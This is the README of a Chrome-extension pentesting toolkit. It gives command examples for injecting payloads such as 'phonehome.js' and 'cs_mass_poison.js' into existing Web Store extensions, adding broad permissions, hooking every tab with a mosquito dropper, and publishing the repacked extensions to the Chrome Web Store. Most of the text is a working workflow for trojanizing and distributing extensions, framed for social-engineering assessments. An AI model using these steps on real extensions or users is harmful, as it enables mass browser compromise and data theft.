Krzysztof Kotowicz
Krzysztof Kotowicz added payloads
Latest commit 3947bac Mar 22, 2014

Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments.


  • Krzysztof Kotowicz - @kkotowicz - blog
  • Michele '@antisnatchor' Orru


Bunch of scripts for injecting existing extensions with new code: Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx).


  • bash
  • ruby
  • zip (cmd line)
  • curl (cmd line)
  • Google Chrome (used in crx mode only)


# get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/
$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js

# Same, but pack into instead
$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk zip payloads/phonehome.js

# Create new CRX with Google Chrome
$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js

# Inject into existing CRX file
$ injector/ original.crx crx repacked.crx payloads/phonehome.js

# Add some permissions into manifest.json
$ injector/ original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy"

# Add persistent content script file launching on every tab
$ echo 'console.log(location.href)' > cs.js
$ injector/ original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

For example - mass poisoning every tab with mosquito:

# start mosquito server:
$ cd path/to/mosquito 
$ python mosquito/ 8082 4444 --http 8000

# generate mosquito hook:
# - visit http://localhost:8000/generate
# - save hook as cs.js

# inject mosquito dropper into extension:
$ injector/ original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs,<all_urls>" cs.js

Webstore Uploader

Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store


  • ruby


# Preparation:

1. Create Chrome developer account
2. Login at
3. Pay your $5 one time fee (credit card needed)
4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file

# Get Chrome extension code
#  e.g. run Injector in zip mode:

$ injector/ clcbnchcgjcjphmnpndoelbdhakdlfkk zip payloads/phonehome.js

# (optional) - prepare screenshot / description file

# publish the extension right away
$ ruby webstore_uploader/webstore_upload.rb publish description.txt screenshot.png

# or just upload & save it:
$ ruby webstore_uploader/webstore_upload.rb save description.txt screenshot.png

# you can access the extension from your developer dashboard